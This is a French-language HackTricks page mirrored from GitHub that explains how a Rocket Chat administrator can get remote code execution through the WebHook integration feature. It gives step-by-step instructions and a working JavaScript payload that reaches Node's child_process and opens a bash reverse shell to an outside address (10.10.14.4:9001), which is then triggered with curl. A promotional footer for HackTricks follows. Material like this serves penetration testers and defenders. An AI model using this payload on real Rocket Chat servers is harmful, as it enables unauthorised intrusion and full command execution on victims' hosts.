mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-30 06:53:11 +00:00
3.2 KiB
3.2 KiB
RCE
Si vous êtes administrateur dans Rocket Chat, vous pouvez obtenir une RCE.
- Allez dans
Intégrations
et sélectionnezNouvelle intégration
et choisissez n'importe laquelle :Incoming WebHook
ouOutgoing WebHook
./admin/integrations/incoming
- Selon la documentation, les deux utilisent ES2015 / ECMAScript 6 (essentiellement JavaScript) pour traiter les données. Alors, obtenons un shell inversé pour javascript comme suit :
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
- Configurez le WebHook (le canal et le nom d'utilisateur du message doivent exister) :
- Configurez le script WebHook :
- Enregistrez les modifications
- Obtenez l'URL WebHook générée :
- Appelez-le avec curl et vous devriez recevoir le shell inversé
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Travaillez-vous dans une entreprise de cybersécurité ? Voulez-vous voir votre entreprise annoncée dans HackTricks ? ou voulez-vous avoir accès à la dernière version de PEASS ou télécharger HackTricks en PDF ? Consultez les PLANS D'ABONNEMENT !
- Découvrez The PEASS Family, notre collection exclusive de NFTs
- Obtenez le swag officiel PEASS & HackTricks
- Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez moi sur Twitter 🐦@carlospolopm.
- Partagez vos astuces de piratage en soumettant des PR au repo hacktricks et au repo hacktricks-cloud.